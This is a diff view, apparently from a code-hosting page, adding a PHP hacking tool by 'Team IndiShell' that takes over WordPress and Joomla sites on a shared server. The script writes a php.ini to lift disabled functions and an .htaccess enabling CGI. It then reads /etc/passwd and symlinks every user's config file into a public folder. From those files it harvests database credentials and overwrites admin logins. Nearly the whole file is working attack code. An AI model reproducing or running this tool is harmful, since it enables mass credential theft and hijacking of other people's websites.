|
| 1 | + <?php |
| 2 | + |
| 3 | + |
| 4 | + |
| 5 | + |
| 6 | + $head = ' |
| 7 | +<html> |
| 8 | +<head> |
| 9 | +</script> |
| 10 | +<title>--==[[Code breaker ICA wordpress/joomla mass username/password changer By Team IndiShell]]==--</title> |
| 11 | +<meta http-equiv="Content-Type" content="text/html; charset=UTF-8"> |
| 12 | +
|
| 13 | +<STYLE> |
| 14 | +body { |
| 15 | +background-image: url("http://geektech.in/wp-content/uploads/2011/07/40906_136291719754164_100001200112272_190608_3706908_n.jpg"); |
| 16 | +background-position: center center; |
| 17 | +background-repeat: no-repeat; |
| 18 | +background-size: 400px 650px; |
| 19 | +background-color: #000000; |
| 20 | +background-attachment: fixed; |
| 21 | +font-family: Tahoma |
| 22 | +} |
| 23 | +tr { |
| 24 | +BORDER: dashed 1px #333; |
| 25 | +color: #FFF; |
| 26 | +} |
| 27 | +td { |
| 28 | +BORDER: dashed 1px #333; |
| 29 | +color: #FFF; |
| 30 | +} |
| 31 | +.table1 { |
| 32 | +BORDER: 0px Black; |
| 33 | +BACKGROUND-COLOR: Black; |
| 34 | +color: #FFF; |
| 35 | +} |
| 36 | +.td1 { |
| 37 | +BORDER: 0px; |
| 38 | +BORDER-COLOR: #333333; |
| 39 | +font: 7pt Verdana; |
| 40 | +color: Green; |
| 41 | +} |
| 42 | +.tr1 { |
| 43 | +BORDER: 0px; |
| 44 | +BORDER-COLOR: #333333; |
| 45 | +color: #FFF; |
| 46 | +} |
| 47 | +table { |
| 48 | +BORDER: dashed 1px #333; |
| 49 | +BORDER-COLOR: #333333; |
| 50 | +BACKGROUND-COLOR: Black; |
| 51 | +color: #FFF; |
| 52 | +} |
| 53 | +input { |
| 54 | +border : solid 2px; |
| 55 | +border-color : #333; |
| 56 | +BACKGROUND-COLOR: white; |
| 57 | +font: 10pt comic sans ms; |
| 58 | +color: black; |
| 59 | +} |
| 60 | +select { |
| 61 | +BORDER-RIGHT: Black 2px solid; |
| 62 | +BORDER-TOP: #DF0000 1px solid; |
| 63 | +BORDER-LEFT: #DF0000 1px solid; |
| 64 | +BORDER-BOTTOM: Black 1px solid; |
| 65 | +BORDER-color: #FFF; |
| 66 | +BACKGROUND-COLOR: Black; |
| 67 | +font: 8pt Verdana; |
| 68 | +color: Red; |
| 69 | +} |
| 70 | +submit { |
| 71 | +BORDER: buttonhighlight 2px outset; |
| 72 | +BACKGROUND-COLOR: Black; |
| 73 | +width: 40%; |
| 74 | +color: white; |
| 75 | +} |
| 76 | +textarea { |
| 77 | +border : dashed 2px #333; |
| 78 | +BACKGROUND-COLOR: Black; |
| 79 | +font: Fixedsys bold; |
| 80 | +color: #999; |
| 81 | +} |
| 82 | +BODY { |
| 83 | + SCROLLBAR-FACE-COLOR: Black; SCROLLBAR-HIGHLIGHT-color: #FFF; SCROLLBAR-SHADOW-color: #FFF; SCROLLBAR-3DLIGHT-color: #FFF; SCROLLBAR-ARROW-COLOR: Black; SCROLLBAR-TRACK-color: #FFF; SCROLLBAR-DARKSHADOW-color: #FFF |
| 84 | +margin: 1px; |
| 85 | +color: Red; |
| 86 | +background-color: Black; |
| 87 | +} |
| 88 | +.main { |
| 89 | +margin : -287px 0px 0px -490px; |
| 90 | +BORDER: dashed 1px #333; |
| 91 | +BORDER-COLOR: #333333; |
| 92 | +} |
| 93 | +.tt { |
| 94 | +background-color: Black; |
| 95 | +} |
| 96 | +
|
| 97 | +A:link { |
| 98 | + COLOR: White; TEXT-DECORATION: none |
| 99 | +} |
| 100 | +A:visited { |
| 101 | + COLOR: White; TEXT-DECORATION: none |
| 102 | +} |
| 103 | +A:hover { |
| 104 | + color: Red; TEXT-DECORATION: none |
| 105 | +} |
| 106 | +A:active { |
| 107 | + color: Red; TEXT-DECORATION: none |
| 108 | +} |
| 109 | +</STYLE> |
| 110 | +<script language=\'javascript\'> |
| 111 | +function hide_div(id) |
| 112 | +{ |
| 113 | + document.getElementById(id).style.display = \'none\'; |
| 114 | + document.cookie=id+\'=0;\'; |
| 115 | +} |
| 116 | +function show_div(id) |
| 117 | +{ |
| 118 | + document.getElementById(id).style.display = \'block\'; |
| 119 | + document.cookie=id+\'=1;\'; |
| 120 | +} |
| 121 | +function change_divst(id) |
| 122 | +{ |
| 123 | + if (document.getElementById(id).style.display == \'none\') |
| 124 | + show_div(id); |
| 125 | + else |
| 126 | + hide_div(id); |
| 127 | +} |
| 128 | +</script>'; ?> |
| 129 | +<html> |
| 130 | + <head> |
| 131 | + <?php |
| 132 | + echo $head ; |
| 133 | + echo ' |
| 134 | +<div align=center><font color=white font size=4><marquee behavior="scroll" direction="left" scrollamount="2" scrolldelay="3" width="50%"><span class="footerlink">Special f**k goes to my best buddy "Suriya CyberTyson" <img src=http://l.yimg.com/us.yimg.com/i/mesg/emoticons7/4.gif></span></marquee><br></font></div> |
| 135 | +<table width="100%" cellspacing="0" cellpadding="0" class="tb1" > |
| 136 | +
|
| 137 | + |
| 138 | +
|
| 139 | + <td width="100%" align=center valign="top" rowspan="1"> |
| 140 | + <font color=#ff9933 size=5 face="comic sans ms"><b>--==[[ Code Breaker ICA ]]==--</font><font color=white size=5 face="comic sans ms"><b><br> <font color=#ff9933 size=5 face="comic sans ms">--==[[ <img src=http://l.yimg.com/us.yimg.com/i/mesg/emoticons7/4.gif> w0rdpress/joomla mass </font><font color=white size=5 face="comic sans ms">admin panel username/password </font><font color=green size=5 face="comic sans ms"><b>changer By Team IndiShell <img src=http://l.yimg.com/us.yimg.com/i/mesg/emoticons7/4.gif> ]]==--</font> <div class="hedr"> |
| 141 | +
|
| 142 | + <td height="10" align="left" class="td1"></td></tr><tr><td |
| 143 | + width="100%" align="center" valign="top" rowspan="1"><font |
| 144 | + color="red" face="comic sans ms"size="1"><b> |
| 145 | + <font color=#ff9933> |
| 146 | +################################################</font><font color=white>################################################</font><font color=green>################################################</font><br><font color=white>-==[[Greetz to]]==--</font><br> <font color=#ff9933>Guru ji zero ,code breaker ica, root_devil, google_warrior,INX_r0ot,Darkwolf indishell,Baba ,Silent poison India,Magnum sniper,Atul Dwivedi,ethicalnoob Indishell,Local root indishell,Irfninja indishell<br>Reborn India,cool toad,cool shavik,Alicks,Ebin V Thomas,Dinelson Amine,Th3 D3str0yer,SKSking,Mr. Trojan,rad paul,Godzila,mike waals,zoo,cyber warrior,Neo hacker ICA<br>Suriya Prakash,cyber gladiator,Cyber Ace, Golden boy INDIA,Ketan Singh,Yash,,Aneesh DograAR AR,saad abbasi,hero,Minhal Mehdi ,Raj bhai ji , Hacking queen ,lovetherisk and rest of TEAM INDISHELL<br> |
| 147 | +<font color=white>--==[[Love to]]==--</font><br># My Father , my Ex Teacher,cold fire hacker,Mannu, ViKi ,Soldier Of God, Bhuppi,Mohit, Ffe ^_^,Ashish,Shardhanand ,Budhaoo<br> |
| 148 | +<font color=white>--==[[Interface Desgined By]]==--</font><br><font color=red>GCE College ke DON :D</font><br><font color=#ff9933> |
| 149 | +################################################</font><font color=white>#################################################</font><font color=green>################################################</font> |
| 150 | +
|
| 151 | + |
| 152 | + </table> |
| 153 | + |
| 154 | +</table> |
| 155 | +'; |
| 156 | +?> |
| 157 | + |
| 158 | + <body bgcolor=black><h3 style="text-align:center"> |
| 159 | + <form method=post><font color=white size=3 face="comic sans ms">Bhai ji ,Run php.ini first of all :) <br>The button given below generates php.ini file :)</font><br> |
| 160 | +<input type=submit name=ini value="use to Generate PHP.ini" /></form> |
| 161 | + |
| 162 | +<?php |
| 163 | + if(isset($_POST['ini'])) |
| 164 | + { |
| 165 | + |
| 166 | + $r=fopen('php.ini','w'); |
| 167 | + $rr=" disbale_functions=none "; |
| 168 | + fwrite($r,$rr); |
| 169 | + $link="<a href=php.ini><font color=white size=2 face=\"comic sans ms\"><u>open this link in new tab to run PHP.INI</u></font></a>"; |
| 170 | + echo $link; |
| 171 | + echo "<br>"; |
| 172 | + } |
| 173 | + ?> |
| 174 | + <font size=4>--==[[ </font><a href="<?php echo '?whole'; ?>"><font color=white size=4 face="comic sans ms">change user/pass for whole server</font></a> ]]==--</font><br> |
| 175 | + <?php |
| 176 | +if(isset($_GET['whole'])) |
| 177 | +{ |
| 178 | +echo "<font color=white size=3 face=\"comic sans ms\">bhai ji ,select your target type(whether you want to change uname/pass for wordpress , joomla or for both) <br> fill the username/password that you want to set for admin panels :)<br><form method=post><font color=white size=3 face=\"comic sans ms\">"; |
| 179 | +?><div align=center><table width=30% border=0px> |
| 180 | +<tr> |
| 181 | +<td align=center width=50%> |
| 182 | + |
| 183 | +<form method=post><font color=#ff9933 size=4 face="comic sans ms"> |
| 184 | +wordpress: <input type="checkbox" name="config[]" value="wp"><br> |
| 185 | +joomla: <input type="checkbox" name="config[]" value="joomla"><br> |
| 186 | +</td></tr></table> |
| 187 | +username:<input type=text name=uname value=Team><br> |
| 188 | +Password:<input type=text name=pass value=INDISHELL></font><p> |
| 189 | +<input type=submit name=start value="start 8-)"></form> |
| 190 | +<p> |
| 191 | +<?php |
| 192 | +} |
| 193 | +?> |
| 194 | +<?php |
| 195 | +error_reporting(0); |
| 196 | +function entre2v2($text,$marqueurDebutLien,$marqueurFinLien) |
| 197 | +{ |
| 198 | + |
| 199 | +$ar0=explode($marqueurDebutLien, $text); |
| 200 | +$ar1=explode($marqueurFinLien, $ar0[1]); |
| 201 | +$ar=trim($ar1[0]); |
| 202 | +return $ar; |
| 203 | +} |
| 204 | + |
| 205 | +function data($lu) |
| 206 | +{ |
| 207 | + $ch = curl_init(); |
| 208 | + |
| 209 | +curl_setopt($ch, CURLOPT_URL, $lu); |
| 210 | +curl_setopt($ch, CURLOPT_HEADER, 1); |
| 211 | +curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); |
| 212 | +curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 5); |
| 213 | +curl_setopt($ch, CURLOPT_USERAGENT, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.8) Gecko/2009032609 Firefox/3.0.8'); |
| 214 | +$result['EXE'] = curl_exec($ch); |
| 215 | +curl_close($ch); |
| 216 | +return $result['EXE']; |
| 217 | + |
| 218 | +} |
| 219 | + |
| 220 | + |
| 221 | +?> |
| 222 | +<?php |
| 223 | +set_time_limit(0); |
| 224 | +if(isset($_POST['start'])) |
| 225 | +{ |
| 226 | +$uname=$_POST['uname']; |
| 227 | +$pass=$_POST['pass']; |
| 228 | +/////////////////////// |
| 229 | +///// Htaccess ///////// |
| 230 | +/////////////////////// |
| 231 | +mkdir('Indishell',0777); |
| 232 | +$rr = " <Files *.php> |
| 233 | +ForceType application/x-httpd-php4 |
| 234 | +</Files> |
| 235 | +Options FollowSymLinks MultiViews Indexes ExecCGI |
| 236 | +AddType application/x-httpd-cgi .ica |
| 237 | +AddHandler cgi-script .ica |
| 238 | +AddHandler cgi-script .ica"; |
| 239 | +$g = fopen('Indishell/.htaccess','w'); |
| 240 | +fwrite($g,$rr); |
| 241 | +///////////////////////// |
| 242 | +///////username////////// |
| 243 | +///////////////////////// |
| 244 | +$users=file("/etc/passwd"); |
| 245 | +foreach($users as $user) |
| 246 | +{ |
| 247 | +$str=explode(":",$user); |
| 248 | +$us=$str[0]; |
| 249 | +$u=trim($us); |
| 250 | +$r="Indishell/"; |
| 251 | +symlink('/home/'.$u.'/public_html/wp-config.php',$r.$u.'..wp-config'); |
| 252 | +symlink('/home/'.$u.'/public_html/wordpress/wp-config.php',$r.$u.'..word-wp'); |
| 253 | +symlink('/home/'.$u.'/public_html/blog/wp-config.php',$r.$u.'..wpblog'); |
| 254 | +symlink('/home/'.$u.'/public_html/configuration.php',$r.$u.'..joomla-or-whmcs'); |
| 255 | +symlink('/home/'.$u.'/public_html/joomla/configuration.php',$r.$u.'..joomla'); |
| 256 | +} |
| 257 | + |
| 258 | +$link= 'http://'.$_SERVER['SERVER_NAME'].dirname($_SERVER['SCRIPT_NAME'])."/Indishell/"; |
| 259 | +$re=$link; |
| 260 | + |
| 261 | +//////////////////////// |
| 262 | +///username extractor/// |
| 263 | +//////////////////////// |
| 264 | +if(!empty($_POST['config'])) |
| 265 | + { |
| 266 | + |
| 267 | +$users=file("/etc/passwd"); |
| 268 | +foreach($users as $user) |
| 269 | +{ |
| 270 | + |
| 271 | +$str=explode(":",$user); |
| 272 | +$usersss=$str[0]; |
| 273 | + |
| 274 | + |
| 275 | + |
| 276 | + |
| 277 | + foreach($_POST['config'] as $check) |
| 278 | + { |
| 279 | + |
| 280 | +//////////////// |
| 281 | +///wordpress//// |
| 282 | +//////////////// |
| 283 | + if($check == "wp") |
| 284 | + { |
| 285 | + $wpc=array("..wp-config","..word-wp","..wpblog"); |
| 286 | + |
| 287 | + foreach($wpc as $wpcon) |
| 288 | + { |
| 289 | + $finalurl=$re.$usersss.$wpcon; |
| 290 | + $content=data($finalurl); |
| 291 | + |
| 292 | + if($content && preg_match('/table_prefix/i',$content)) |
| 293 | + { |
| 294 | + |
| 295 | +echo "<div align=center><table width=60% ><tr><td align=center><font color=red size=4 face='comic sans ms'> $usersss user's website cms is wordpress </font></td></tr></table>"; |
| 296 | + |
| 297 | + |
| 298 | +$uname=$_POST['uname']; |
| 299 | + $dbu=entre2v2($content,"define('DB_USER', '","');"); |
| 300 | +$dbp=entre2v2($content,"define('DB_PASSWORD', '","');"); |
| 301 | +$dbn=entre2v2($content,"define('DB_NAME', '","');"); |
| 302 | +$tp=entre2v2($content,"$table_prefix = '","'"); |
| 303 | +$npwd= md5($pass); |
| 304 | +$host="localhost"; |
| 305 | +$dbconnect=@ mysql_connect($host,$dbu,$dbp); |
| 306 | +$dbselect=@ mysql_select_db($dbn,$dbconnect); |
| 307 | + |
| 308 | +if($dbselect) |
| 309 | +{ |
| 310 | +echo "<font color=red>database $dbn has been selected<br>"; |
| 311 | + |
| 312 | +$ru=@ mysql_query("UPDATE ".$tp."users SET user_login ='".$uname."' , user_pass ='".$npwd."' ") ; |
| 313 | +$req =mysql_query("SELECT * from `".$tp."options` WHERE option_name='home'"); |
| 314 | +$data = mysql_fetch_array($req); |
| 315 | +$site_url=$data["option_value"]; |
| 316 | +echo "website is ".$data["option_value"]; |
| 317 | +if(!$ru) |
| 318 | +{ |
| 319 | +echo "<font size=2 color=red face='comic sans ms'><br>could not update username/password :P</font>"; |
| 320 | +} |
| 321 | +else { |
| 322 | + |
| 323 | +echo "<div align=center><table width=60% boorder=1><tr><td align=center><font size=3 color=red face='comic sans ms'>bhai ji,username $uname and password $pass has been updated for ID=1 :D</font></td></tr></table><br>"; |
| 324 | +} |
| 325 | + |
| 326 | +} |
| 327 | + } |
| 328 | + } |
| 329 | + } |
| 330 | +//////////// |
| 331 | +// joomla // |
| 332 | +//////////// |
| 333 | + |
| 334 | + |
| 335 | + if($check == "joomla") |
| 336 | + { |
| 337 | + $joomlac=array("..joomla-or-whmcs","..joomla"); |
| 338 | + foreach($joomlac as $joomlacon) |
| 339 | + { |
| 340 | + $finalurl=$re.$usersss.$joomlacon; |
| 341 | + $content=data($finalurl); |
| 342 | + |
| 343 | + if($content && preg_match('/dbprefix/i',$content)) |
| 344 | + { |
| 345 | + |
| 346 | +echo "<div align=center><table width=60% ><tr><td align=center><font color=red size=4 face='comic sans ms'> $usersss user's website cms is joomla </font></td></tr></table>"; |
| 347 | + |
| 348 | + |
| 349 | + |
| 350 | + |
| 351 | + |
| 352 | +$uname=$_POST['uname']; |
| 353 | + $dbu=entre2v2($content,"user = '","';"); |
| 354 | + $dbp=entre2v2($content,"password = '","';"); |
| 355 | + $dbn=entre2v2($content,"db = '","';"); |
| 356 | + $dp=entre2v2($content,"dbprefix = '","';"); |
| 357 | +$np= md5($pass); |
| 358 | +$host="localhost"; |
| 359 | +$dbconnect=@ mysql_connect($host,$dbu,$dbp); |
| 360 | +$dbselect=@ mysql_select_db($dbn,$dbconnect); |
| 361 | + if($dbselect) |
| 362 | + { |
| 363 | + echo "<font color=red>database $dbn has been selected<br>"; |
| 364 | +$run =@mysql_query("UPDATE `".$dp."users` SET username ='".$uname."' , password ='".$np."' WHERE usertype ='Super Administrator'"); |
| 365 | + |
| 366 | +$run =@mysql_query("UPDATE `".$dp."users` SET username ='".$uname."' , password ='".$np."' WHERE usertype = 'deprecated'"); |
| 367 | + |
| 368 | + if(!$run) |
| 369 | + { |
| 370 | + echo "<font size=2 color=white face='comic sans ms'><br>something went wrong :P"; |
| 371 | + } |
| 372 | + else { |
| 373 | + |
| 374 | + echo "<div align=center><table width=60% boorder=1><tr><td align=center><font size=3 color=red face='comic sans ms'>bhai ji,username $uname and password $pass has been updated for ID=1 :D</font></td></tr></table><br>"; |
| 375 | + } |
| 376 | + } |
| 377 | + |
| 378 | + |
| 379 | + } |
| 380 | + |
| 381 | + |
| 382 | + |
| 383 | + } |
| 384 | + |
| 385 | + |
| 386 | + } |
| 387 | +} |
| 388 | +} |
| 389 | +} |
| 390 | + |
| 391 | +} |
| 392 | +?> |
0 commit comments